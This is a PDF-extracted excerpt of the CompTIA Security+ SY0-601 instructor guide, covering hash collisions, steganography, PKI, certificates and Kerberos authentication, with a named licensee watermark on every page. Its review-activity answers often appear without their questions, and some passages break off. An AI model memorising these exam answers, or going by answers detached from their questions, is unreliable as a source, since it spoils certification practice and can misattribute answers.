118 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
To exploit the paradox, the attacker creates multiple malicious and benign documents,
both featuring minor changes (punctuation, extra spaces, and so on). Depending on the
length of the hash and the limits to the non-suspicious changes that can be introduced,
if the attacker can generate sufficient variations, then the chance of matching hash
outputs can be better than 50%.
This means that to protect against the birthday attack, encryption algorithms must
demonstrate collision avoidance (that is, to reduce the chance that different inputs
will produce the same output). To exploit the birthday paradox, the attacker generally
has to be able to manipulate both documents/messages, referred to as a chosen prefix
attack (sha-mbles.github.io). The birthday paradox method has been used successfully
to exploit collisions in the MD5 function to create fake digital certificates that appear
to have been signed by a certificate authority in a trusted root chain (trailofbits.files.
wordpress.com/2012/06/flame-md5.pdf).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 119
Review Activity:
Cryptographic Use
Cases and Weaknesses
Answer the following questions:
False—the usages are not exclusive. There are different types of cryptography and
some can be used for non-repudiation. The principle is that if an encryption method
(cipher and key) is known only to one person, that person cannot then deny having
composed a message. This depends on the algorithm design allowing recipients to
decrypt the message but not encrypt it.
A complex system might have to support many inputs from devices installed to
potentially unsecure locations. Such a system is resilient if compromise of a small
part of the system is prevented from allowing compromise of the whole system.
Cryptography assists this goal by ensuring the authentication and integrity of messages
delivered over the control system.
3. For which types of system will a cipher suite that exhibits high latency
be problematic?
High latency is not desirable in any system really, but it will affect real-time protocols
that exchange voice or video most. In network communications, latency makes the
initial protocol handshake longer, meaning delay for users and possible application
timeout issues.
Using a key stretching password storage library, such as PBKDF2, improves resistance
to brute-force cracking methods. You might also mention that you could use policies to
make users choose longer, non-trivial passwords.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
120 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5D
Summarize Other
Cryptographic Technologies
Communications
While quantum computing could put the strength of current cryptographic ciphers
at risk, it also has the promise of underpinning more secure cryptosystems. The
properties of entanglement, superposition, and collapse suit the design of a tamper-
evident communication system that would allow secure key agreement.
Post-Quantum
Post-quantum refers to the expected state of computing when quantum computers
that can perform useful tasks are a reality. Currently, the physical properties of qubits
and entanglement make quantum computers very hard to scale up. At the time of
writing, the most powerful quantum computers have about 50 qubits. A quantum
computer will need about a million qubits to run useful applications.
No one can predict with certainty if or when such a computer will be implemented.
In the meantime, NIST is running a project to develop cryptographic ciphers that
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 121
Lightweight Cryptography
Another problem affecting current cryptographic ciphers is use on low-power devices.
NIST is hoping that a compact cipher suite will be be developed that is both quantum
resistant and that can run on battery-powered devices with minimal CPU and memory
resources (csrc.nist.gov/projects/lightweight-cryptography).
Blockchain is a concept in which an expanding list of transactional records is secured Show Slide(s)
using cryptography. Each record is referred to as a block and is run through a hash
function. The hash value of the previous block in the chain is added to the hash Blockchain
calculation of the next block in the chain. This ensures that each successive block is
cryptographically linked. Each block validates the hash of the previous block, all the way
through to the beginning of the chain, ensuring that each historical transaction has not
been tampered with. In addition, each block typically includes a timestamp of one or
more transactions, as well as the data involved in the transactions themselves.
The blockchain is recorded in a public ledger. This ledger does not exist as an individual
file on a single computer; rather, one of the most important characteristics of a
blockchain is that it is decentralized. The ledger is distributed across a peer-to-peer Show Slide(s)
(P2P) network in order to mitigate the risks associated with having a single point
of failure or compromise. Blockchain users can therefore trust each other equally.
Steganography
Likewise, another defining quality of a blockchain is its openness—everyone has the
same ability to view every transaction on a blockchain. Teaching
Blockchain technology has a variety of potential applications. It can ensure the integrity Tip
and transparency of financial transactions, online voting systems, identity management There are various
systems, notarization, data storage, and more. However, blockchain is still an emerging software applications
technology, and outside of cryptocurrencies, has not yet been adopted on a wide- for inserting
and detecting
ranging scale. steganographic
messages. When
Steganography hiding messages in
files, a substitution
technique such as
Steganography (literally meaning "hidden writing") is a technique for obscuring the
least significant bit is
presence of a message. Typically, information is embedded where you would not preferable to simply
expect to find it; a message hidden in a picture, for instance. The container document inserting a message
or file is called the covertext. A steganography tool is software that either facilitates this as it does not alter the
file size.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
122 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
or conversely that can be used to detect the presence of a hidden message within
a covertext.
When used to conceal information, steganography amounts to "security by obscurity,"
which is usually deprecated. However, a message can be encrypted by some
mechanism before embedding it, providing confidentiality. The technology can also
provide integrity or non-repudiation; for example, it could show that something was
printed on a particular device at a particular time, which could demonstrate that it was
genuine or a fake, depending on context.
One example of steganography is to encode messages within TCP packet data fields to
create a covert message channel. Another approach is to change the least significant
bit of pixels in an image file. This can code a useful amount of information without
distorting the original image noticeably. Similar techniques can be used with other
media types as cover files, such as audio and video files.
These methods might be used for command and control or to exfiltrate data covertly,
bypassing protection mechanisms such as data loss prevention (DLP) (blog.trendmicro.
com/trendlabs-security-intelligence/steganography-and-malware-concealing-code-and-
cc-traffic/). Future developments may see use of steganography in streaming media or
voiceover IP (VoIP).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 123
Review Activity:
Other Cryptographic Technologies
Answer the following questions:
A threat actor could conceal information within an image file and use that to
bypass the DLP system. One thing to note is that attackers could find other ways to
implement covertexts (audio or video, for instance) or abuse protocol coding. There
are many things that steganalysis needs to be able to scan for! You might also note
that steganography is not only a data exfiltration risk. It can also be used to smuggle
malicious code into a host system.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
124 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 5
Summary
Teaching You should be able to summarize types of cryptographic function (hash algorithm,
Tip symmetric cipher, asymmetric cipher) and explain how they are used in hybrid
Check that students encryption products to provide confidentiality, integrity, authentication, and resiliency.
are confident about You should also be able to identify limitations and weaknesses, plus common types of
the content that has cryptographic attacks. Finally, you should be able to summarize other concepts, such as
been covered. If there quantum, blockchain, homomorphic encryption, and steganography.
is time, revisit any
content examples that
they have questions
about. If you have
used all the available
time for this lesson
block, note the issues,
and schedule time for
a review later in the
course.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 6
Implementing Public Key Infrastructure
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
126 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 6A
Implement Certificates and
Certificate Authorities
The basic problem with public key cryptography is that you may not really know with
whom you are communicating. The system is vulnerable to man-in-the-middle attacks.
This problem is particularly evident with e-commerce. How can you be sure that a
shopping site or banking service is really maintained by whom it claims? The fact that
the site is distributing public keys to secure communications is no guarantee of actual
identity. How do you know that you are corresponding directly with the site using
its certificate? How can you be sure there isn't a man-in-the-middle intercepting and
modifying what you think the legitimate server is sending you?
Public key infrastructure (PKI) aims to prove that the owners of public keys are
who they say they are. Under PKI, anyone issuing public keys should obtain a digital
certificate. The validity of the certificate is guaranteed by a certificate authority (CA).
The validity of the CA can be established using various models.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 127
• Ensure the validity of certificates and the identity of those applying for them
(registration).
• Establish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
• Manage the servers (repositories) that store and administer the certificates.
Microsoft Windows Server CA. (Screenshot used with permission from Microsoft.)
The trust model is a critical PKI concept, and shows how users and different CAs are PKI Trust Models
able to trust one another.
Teaching
Single CA Tip
Emphasize that there
In this simple model, a single CA issues certificates to users; users trust certificates
is not one single
issued by that CA and no other. The problem with this approach is that the single CA hierarchy for all
server is very exposed. If it is compromised, the whole PKI collapses. PKIs, and likewise,
there are many root
Hierarchical (Intermediate CA) CAs, one for each
discrete hierarchy.
In the hierarchical model, a single CA (called the root) issues certificates to several An organization can
intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end have its own root CA
entities). This model has the advantage that different intermediate CAs can be set up for its private PKI, for
example.
with different certificate policies, enabling users to perceive clearly what a particular
certificate is designed for. Each leaf certificate can be traced back to the root CA along Interaction
the certification path. This is also referred to as certificate chaining, or a chain of trust. Opportunity
The root's certificate is self-signed. In the hierarchical model, the root is still a single Show a certificate
point of failure. If the root is damaged or compromised, the whole structure collapses. hierarchy for a website
To mitigate against this, however, the root server can be taken offline, as most of the (such as comptia.org).
regular CA activities are handled by the intermediate CA servers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
128 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Another problem is that there is limited opportunity for cross-certification; that is, to
trust the CA of another organization. Two organizations could agree to share a root
CA, but this would lead to operational difficulties that could only increase as more
organizations join. In practice, most clients are configured to trust multiple root CAs.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 129
Digital certificates are based on the X.509 standard approved by the International
Telecommunications Union and standardized by the Internet Engineering Taskforce
(tools.ietf.org/html/rfc5280). The Public Key Infrastructure (PKIX) working group
manages the development of these standards. RSA also created a set of standards,
referred to as Public Key Cryptography Standards (PKCS), to promote the use of
public key infrastructure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
130 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 131
Microsoft's website certificate configured with alternative subject names for different subdomains.
(Screenshot used with permission from Microsoft.)
Listing the specific subdomains is more secure, but if a new subdomain is added, a new
certificate must be issued. A wildcard domain, such as *.comptia.org, means that
the certificate issued to the parent domain will be accepted as valid for all subdomains
(to a single level).
CompTIA's website certificate configured with a wildcard domain, allowing access via either https://
comptia.org or https://www.comptia.org. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
132 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Certificate templates for Windows Server CA. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 133
Domain validation certificate. Only the padlock is shown and the browser reports that the owner is not
verified. (Screenshot used with permission from Microsoft.)
Extended validation certificate from GlobalSign with the verified owner shown in green next to the
padlock. (Screenshot used with permission from GlobalSign, Inc.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
134 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Email/User Certificates
An email certificate can be used to sign and encrypt email messages, typically using
Secure Multipart Internet Message Extensions (S/MIME) or Pretty Good Privacy (PGP).
The user's email address must be entered as the SAN and CN. On a directory-based
local network, such as Windows Active Directory, there may be a need for a wider
range of user certificate types. For example, in AD there are user certificate templates
for standard users, administrators, smart card logon/users, recovery agent users,
and Exchange mail users (with separate templates for signature and encryption). Each
certificate template has different key usage definitions.
Requesting a certificate. The CA has made several user-type certificate templates available with
different key usage specifications (encrypting files, signing emails, encrypting emails, and so on).
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 135
Root Certificate
The root certificate is the one that identifies the CA itself. The root certificate is
self-signed. A root certificate would normally use a key size of at least 2048 bits.
Many providers are switching to 4096 bits. The CN for a root certificate is set to the
organization/CA name, such as "CompTIA Root CA," rather than an FQDN.
Self-signed Certificates
Any machine, web server, or program code can be deployed with a self-signed
certificate. Self-signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
136 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Certificates and Certificate Authorities
Answer the following questions:
In most cases, the subject generates a key pair then adds the public key along with
subject information and certificate type in a certificate signing request (CSR) and
submits it to the CA. If the CA accepts the request, it generates a certificate with the
appropriate key usage and validity, signs it, and transmits it to the subject.
The subject's public key and the algorithms used for encryption and hashing. The
certificate also stores a digital signature from the issuing CA, establishing the chain of
trust.
That the application processing the certificate must be able to interpret the extension
correctly. Otherwise, it should reject the certificate.
5. You are developing a secure web application. What sort of certificate should
you request to show that you are the publisher of a program?
A code signing certificate. Certificates are issued for specific purposes. A certificate
issued for one purpose should not be reused for other functions.
6. What extension field is used with a web server certificate to support the
identification of the server by multiple specific subdomain labels?
The subject alternative name (SAN) field. A wildcard certificate will match any
subdomain label.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 137
Topic 6B
Implement PKI Management
Key management refers to operational considerations for the various stages in a key's Certificate and Key
life cycle. A key's life cycle may involve the following stages: Management
• Key generation—creating a secure key pair of the required strength, using the
Teaching
chosen cipher.
Tip
• Certificate generation—to identify the public part of a key pair as belonging to a We're focusing
subject (user or computer), the subject submits it for signing by the CA as a digital on public key
certificate with the appropriate key usage. At this point, it is critical to verify the cryptography
here, but do note
identity of the subject requesting the certificate and only issue it if the subject that symmetric
passes identity checks. keys and SSH keys
have management
• Storage—the user must take steps to store the private key securely, ensuring that requirements too.
unauthorized access and use is prevented. It is also important to ensure that the We'll be covering SSH
private key is not lost or damaged. later in the course.
• Revocation—if a private key is compromised, the key pair can be revoked to prevent
users from trusting the public key.
• Expiration and renewal—a key pair that has not been revoked expires after a certain
period. Giving the key or certificate a "shelf-life" increases security. Certificates can
be renewed with new key material.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
138 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Another way to use M-of-N control is to split a key between several storage devices (such as
three USB sticks, any two of which could be used to recreate the full key).
If the key used to decrypt data is lost or damaged, the encrypted data cannot be
recovered unless a backup of the key has been made. A significant problem with key
storage is that if you make multiple backups of a key, it is exponentially more difficult
to ensure that the key is not compromised. However, if the key is not backed up, the
storage system represents a single point of failure. Key recovery defines a secure
process for backing up keys and/or recovering data encrypted with a lost key. This
process might use M-of-N control to prevent unauthorized access to (and use of)
the archived keys. Escrow means that something is held independently. In terms of
key management, this refers to archiving a key (or keys) with a third party. This is a
useful solution for organizations that don't have the capability to store keys securely
themselves, but it invests a great deal of trust in the third party.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 139
CRLs published by Windows Certificate Services—The current CRL contains one revoked certificate.
(Screenshot used with permission from Microsoft.)
With the CRL system, there is a risk that the certificate might be revoked but still
accepted by clients because an up-to-date CRL has not been published. A further
problem is that the browser (or other application) may not be configured to
perform CRL checking, although this now tends to be the case only with legacy
browser software.
Another means of providing up-to-date information is to check the certificate's status Online Certificate
on an Online Certificate Status Protocol (OCSP) server, referred to as an OCSP Status Protocol
responder. Rather than return a whole CRL, this just communicates the status of the Responders
requested certificate. Details of the OCSP responder service should be published in
the certificate.
Most OCSP servers can query the certificate database directly and obtain the real-time
status of a certificate. Other OCSP servers actually depend on the CRLs and are limited by
the CRL publishing interval.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
140 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
One of the problems with OCSP is that the job of responding to requests is resource
intensive and can place high demands on the issuing CA running the OCSP responder.
There is also a privacy issue, as the OCSP responder could be used to monitor and
record client browser requests. OCSP stapling resolves these issues by having the SSL/
TLS web server periodically obtain a time-stamped OCSP response from the CA. When
a client submits an OCSP request, the web server returns the time-stamped response,
rather than making the client contact the OCSP responder itself.
Base64-encoded .CER file opened in Notepad. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 141
File Extensions
A three character file extension is a convention, not a standard, and unfortunately file
extensions do not always map cleanly to the type of encoding used within a certificate
file, or even to the contents of a certificate file. The only certain way to check is to open
it in a text editor.
• Both .DER and .PEM can be used as file extensions, although the latter is not
recognized by Windows. .PEM is the the most widely used extension for ASCII
format files in Linux.
• The .CRT and .CER extensions can also be used, but they they are not well-
standardized. Most of the confusion arises from the way Windows handles
certificates. In Linux, .CRT is most likely to represent an ASCII certificate. In Windows,
the most common extension is .CER, but this does not tell you whether the file
format is binary or ASCII.
Contents
A certificate file can also contain more than just a single certificate:
• The PKCS #12 format allows the export of the private key with the certificate. This
would be used either to transfer a private key to a host that could not generate
its own keys, or to back up/archive a private key. This type of file format is usually
password-protected and always binary. On Windows, these usually have a .PFX
extension, while MacOS and iOS use .P12. In Linux, the certificate and key are
usually stored in separate files.
• The P7B format implements PKCS #7, which is a means of bundling multiple
certificates in the same file. It is typically in ASCII format. This is most often used
to deliver a chain of certificates that must be trusted by the processing host. It
is associated with the use of S/MIME to encrypt email messages. P7B files do
not contain the private key. In Linux, the .PEM extension is very widely used for
certificate chains.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
142 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
This example is simplified. Using a root CA to issue leaf certificates directly is not robust. It is
better to create one or more intermediate CAs.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 143
The most common problem when dealing with certificate issues is that of a client Certificate Issues
rejecting a server certificate (or slightly less commonly, an authentication server
rejecting a client's certificate). Teaching
• If the problem is with an existing certificate that has been working previously, check Tip
that the certificate has not expired or been revoked or suspended. Troubleshooting is no
longer called out on
• If the problem is with a new certificate, check that the key usage settings are the syllabus, so you
may prefer to skip this
appropriate for the application. Some clients, such as VPN and email clients, have
section. It has been
very specific requirements for key usage configuration. Also, check that the subject retained as general
name is correctly configured and that the client is using the correct address. For implementation detail.
example, if a client tries to connect to a server by IP address instead of FQDN, a Point out that
certificate configured with an FQDN will be rejected. browsers often use a
different set of root
• If troubleshooting a new certificate that is correctly configured, check that clients trusts than Windows
have been configured with the appropriate chain of trust. You need to install root itself does.
and intermediate CA certificates on the client before a leaf certificate can be trusted.
Be aware that some client applications might maintain a different certificate store to
that of the OS.
• In either case, verify that the time and date settings on the server and client
are synchronized. Incorrect date/time settings are a common cause of
certificate problems.
From a security point of view, you must also audit certificate infrastructure to
ensure that only valid certificates are being issued and trusted. Review logs of issued
certificates periodically. Validate the permissions of users assigned to manage
certificate services. Check clients to ensure that only valid root CA certificates are
trusted. Make sure clients are checking for revoked or suspended certificates.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
144 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
PKI Management
Answer the following questions:
It puts both data confidentiality and identification and authentication systems at risk.
Depending on the key usage, the key may be used to decrypt data with authorization.
The key could also be used to impersonate a user or computer account.
2. You are advising a customer about encryption for data backup security and
the key escrow services that you offer. How should you explain the risks of
key escrow and potential mitigations?
Escrow refers to archiving the key used to encrypt the customer's backups with your
company as a third party. The risk is that an insider attack from your company may be
able to decrypt the data backups. This risk can be mitigated by requiring M-of-N access
to the escrow keys, reducing the risk of a rogue administrator.
HTTP Public Key Pinning (HPKP) ensures that when a client inspects the certificate
presented by a server or a code-signed application, it is inspecting the proper
certificate by submitting one or more public keys to an HTTP browser via an HTTP
header.
5. What type of certificate format can be used if you want to transfer your
private key and certificate from one Windows host computer to another?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 145
Lesson 6
Summary
Teaching
You should be familiar with the tools and procedures used to issue different types of
Tip
certificate and manage PKI operations.
Check that students
are confident about
Guidelines for Implementing Public Key Infrastructure the content that has
been covered. If there
Follow these guidelines when you implement public key infrastructure (PKI) on a is time, revisit any
private network: content examples that
they have questions
• Determine whether to use a single CA or intermediate structure and take steps to about. If you have
ensure the security of the root, keeping it offline if that is operationally possible. used all the available
time for this lesson
• Determine certificate policies and templates that meet the needs of users and block, note the issues
business workflows, such as machine, email/user, and code signing certificate and schedule time for
a review later in the
types. Ensure that the common name attribute is correctly configured when
course.
issuing certificates.
• Create policies and procedures for users and servers to request certificates, plus the
identification, authentication, and authorization processes to ensure certificates are
only issued to valid subjects.
• Set up procedures for managing keys and certificates, including revocation and
backup/escrow of keys.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 7
Implementing Authentication Controls
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
148 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7A
Summarize Authentication
Design Concepts
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 149
IAM enables you to define the attributes that make up an entity's identity, such as its
purpose, function, security clearance, and more. These attributes subsequently enable
access management systems to make informed decisions about whether to grant
or deny an entity access, and if granted, decide what the entity has authorization to
do. For example, an individual employee may have his or her own identity in the IAM
system. The employee's role in the company factors into his or her identity, such as
what department the employee is in and whether the employee is a manager. For
example, if you are setting up an e-commerce site and want to enroll users, you need
to select the appropriate controls to perform each function:
• Identification—ensure that customers are legitimate. For example, you might need
to ensure that billing and delivery addresses match and that they are not trying to
use fraudulent payment methods.
• Authentication—ensure that customers have unique accounts and that only they
can manage their orders and billing information.
• Accounting—the system must record the actions a customer takes (to ensure that
they cannot deny placing an order, for instance).
The servers and protocols that implement these functions are referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise processes and workflows is becoming more prevalent as the importance of
the identification phase is better acknowledged.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
150 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A knowledge factor is also used for account reset mechanisms. For example, to reset
the password on an account, the user might have to respond to a challenge question,
such as, "What is your favorite movie?"
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 151
certificate or account number. Alternatively, they might have a USB fob that generates
a unique code. These ownership factors can be described as hard tokens.
A device such as a smartphone can also be used to receive a uniquely generated
access code as a soft token. Unlike a password, these tokens are valid for only one use,
typically within a brief time window.
Authentication design refers to selecting a technology that meets requirements for Authentication Design
confidentiality, integrity, and availability:
• Confidentiality, in terms of authentication, is critical, because if account credentials
are leaked, threat actors can impersonate the account holder and act on the system
with whatever rights they have.
• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.
• Availability means that the time taken to authenticate does not impede workflows
and is easy enough for users to operate.
Authentication is used in different contexts and factors are not always well-suited
to a context. For example, you might authenticate to a PC by inputting a password
to get access to the device. This might also authenticate you to a network. But
authentication is also used for physical security. If you consider numerous employees
arriving for work, asking them to type a password to gain access to the building
would take too long and cause huge disruption (lack of availability). It is also highly
likely that passwords would be observed (lack of confidentiality). Finally, it is likely
that users would simply start holding the door open for each other (lack of integrity).
Authentication design tries to anticipate these issues and implements a technology that
fits the use case.
An authentication technology is considered strong if it combines the use of more than Multifactor
one type of knowledge, ownership, and biometric factor, and is called multifactor Authentication
authentication (MFA). Single-factor authentication can quite easily be compromised: a
password could be written down or shared, a smart card could be lost or stolen, and a Teaching
biometric system could be subject to high error rates or spoofing. Tip
We will introduce the
Two-Factor Authentication (2FA) combines either an ownership-based smart card or concept later, but you
biometric identifier with something you know, such as a password or PIN. Three-factor might want to mention
authentication combines all three technologies, or incorporates an additional attribute, 2-step verification
such as location; for example, a smart card with integrated fingerprint reader. This here, to contrast with
means that to authenticate, the user must possess the card, the user's fingerprint must MFA.
match the template stored on the card, and the user must input a PIN or password.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
152 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 153
Review Activity:
Authentication Design Concepts
Answer the following questions:
Authorization means granting the account that has been configured for the user on
the computer system the right to make use of a resource. Authorization manages
the privileges granted on the resource. Authentication protects the validity of the user
account by testing that the person accessing that account is who she/he says she/he is.
Perform checks to confirm the user's identity, issue authentication credentials securely,
assign appropriate permissions/privileges to the account, and ensure accounting
mechanisms to audit the user's activity.
You can query the location service running on a device or geolocation by IP. You could
use location with the network, based on switch port, wireless network name, virtual
LAN (VLAN), or IP subnet.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
154 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7B
Implement Knowledge-Based
Authentication
Windows Authentication
Windows authentication involves a complex architecture of components (docs.
microsoft.com/en-us/windows-server/security/windows-authentication/credentials-
processes-in-windows-authentication), but the following three scenarios are typical:
• Windows local sign-in—the Local Security Authority (LSA) compares the submitted
credential to a hash stored in the Security Accounts Manager (SAM) database, which
is part of the registry. This is also referred to as interactive logon.
• Windows network sign-in—the LSA can pass the credentials for authentication to
a network service. The preferred system for network authentication is based on
Kerberos, but legacy network applications might use NT LAN Manager (NTLM)
authentication.
• Remote sign-in—if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network (VPN) or
web portal.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 155
Linux Authentication
In Linux, local user account names are stored in /etc/passwd. When a user logs
in to a local interactive shell, the password is checked against a hash stored in /etc/
shadow. Interactive login over a network is typically accomplished using Secure Shell
(SSH). With SSH, the user can be authenticated using cryptographic keys instead of a
password.
A pluggable authentication module (PAM) is a package for enabling different
authentication providers, such as smart-card login (tecmint.com/configure-pam-
in-centos-ubuntu-linux). The PAM framework can also be used to implement
authentication to network servers.
Kerberos is a single sign-on network authentication and authorization protocol used Kerberos
on many networks, notably as implemented by Microsoft's Active Directory (AD) Authentication
service. Kerberos was named after the three-headed guard dog of Hades (Cerberus)
because it consists of three parts. Clients request services from application servers, Teaching
which both rely on an intermediary—a Key Distribution Center (KDC)—to vouch for Tip
their identity. There are two services that make up a KDC: the Authentication Service Kerberos can be
and the Ticket Granting Service. The KDC runs on port 88 using TCP or UDP. difficult to follow, with
multiple use of secret
and session keys from
different sources.
Stress the main point
that Kerberos provides
single sign-on through
the use of tickets or
tokens.
Note the use of
time-stamping to
defeat replay attacks
and the use of
symmetric, rather
than asymmetric,
encryption (i.e.,
contrast Kerberos with
PKI).
Teaching
Tip
The server can decrypt
Kerberos Authentication Service. (Images © 123RF.com.) the request because
it holds a copy of the
user's password hash.
The Authentication Service is responsible for authenticating user logon requests. More This shows that the
generally, users and services can be authenticated; these are collectively referred to user has entered the
as principals. For example, when you sit at a Windows domain workstation and log correct password and
on to a realm (or domain), the first step of logon is to authenticate with a KDC server, that the system time
implemented as a domain controller. is valid.
1. The client sends the authentication service (AS) a request for a Ticket Granting
Ticket (TGT). This is composed by encrypting the date and time on the local
computer with the user's password hash as the key.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
156 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The password hash itself is not transmitted over the network. Also, although we refer
to passwords for simplicity, the system can use other authentication providers, such as
smart-card logon.
The Ticket Granting Ticket (TGT; or user ticket) is time-stamped (under Windows, they have
a default maximum age of 10 hours). This means that workstations and servers on the
network must be synchronized (to within five minutes) or a ticket will be rejected. This helps
prevent replay attacks.
2. The AS checks that the user account is present, that it can decode the request by
matching the user's password hash with the one in the Active Directory database,
and that the request has not expired. If the request is valid, the AS responds with
the following data:
• Ticket Granting Ticket (TGT)—this contains information about the client (name
and IP address) plus a timestamp and validity period. This is encrypted using
the KDC's secret key.
• TGS session key for use in communications between the client and the Ticket
Granting Service (TGS). This is encrypted using a hash of the user's password.
The TGT is an example of a logical token. All the TGT does is identify who you are and
confirm that you have been authenticated—it does not provide you with access to any
domain resources.
The TGS should be able to decrypt both messages using the KDC's secret key for
the first and the TGS session key for the second. This confirms that the request
is genuine. It also checks that the ticket has not expired and has not been used
before (replay attack).
• Service session key—for use between the client and the application server.
This is encrypted with the TGS session key.
4. The client forwards the service ticket, which it cannot decrypt, to the application
server and adds another time-stamped authenticator, which is encrypted using
the service session key.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 157
5. The application server decrypts the service ticket to obtain the service session
key using its secret key, confirming that the client has sent it an untampered
message. It then decrypts the authenticator using the service session key.
6. Optionally, the application server responds to the client with the timestamp used
in the authenticator, which is encrypted by using the service session key. The
client decrypts the timestamp and verifies that it matches the value already sent,
and concludes that the application server is trustworthy.
Show Slide(s)
This means that the server is authenticated to the client (referred to as mutual
authentication). This prevents a man-in-the-middle attack, where a malicious user PAP, CHAP, and MS-
could intercept communications between the client and server. CHAP Authentication
7. The server now responds to client requests (assuming they conform to the Teaching
server's access control list). Tip
Even though there
The data transfer itself is not encrypted (at least as part of Kerberos; some sort of transport aren't too many
encryption can be deployed). scenarios where either
